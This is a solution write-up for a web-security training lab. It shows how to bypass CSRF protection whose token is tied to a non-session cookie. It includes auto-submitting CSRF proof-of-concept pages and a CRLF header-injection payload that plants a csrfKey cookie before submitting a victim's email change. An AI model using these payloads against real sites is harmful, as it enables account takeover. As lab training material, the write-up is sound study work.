CSRF where token is tied to non-session cookie

Objective

This lab’s email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren’t fully integrated into the site’s session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

You have two accounts on the application that you can use to help design your attack. The credentials are as follows:

wiener:peter
carlos:montoya

Solution

After login, just like the other labs what we saw on a CSRF vulnerability on Update email but there will be certain measures in order to bypass it

If update the email and this is how request and response looks like

Now what I did, let’s generate a simple CSRF POC and check in the current user session which is wiener and it works and updated the email to what I provided

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ae400b403c3a094802ae41800ad0033.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="2&#64;2&#46;com" />
      <input type="hidden" name="csrf" value="f3QjcLNuEvtdJ2kz3MPz0wYHq83LZKli" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

For wiener it works, but with the CSRF I logged in as carlos and checked the POC it didn’t workout because of Invalid CSRF token

Let’s finetune the CSRF POC and our first step to copy the CSRF token from source page once after login as carlos and copy the csrfKey by intercepting the update email and copy it from the header

Fine tuned CSRF POC looks like as follows:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ae400b403c3a094802ae41800ad0033.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="attacker233333&#64;2&#46;com" />
      <input type="hidden" name="csrf" value="HVXSXAHpIyEbsNBBLt9LO2rxlKWTGzub" />
      <input type="submit" value="Submit request" />
    </form>
<img src="https://0ae400b403c3a094802ae41800ad0033.web-security-academy.net/?search=nithisshtest%0d%0aSet-Cookie:%20csrfKey=KosN7sSRNilWGKqc6ihUuKUhprqtGQyn%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
  </body>
</html>

let’s debug on how it works, in the home page we have a search functionality where it is vulnerable to a CRLF attack through we can inject the csrfKey where we copied and copy the CSRF token from POST body of carlos user when you update the email.. If all goes well, when paste the CSRF POC into the exploit server and then click on Store -> Deliver the exploit to victim and that solves the lab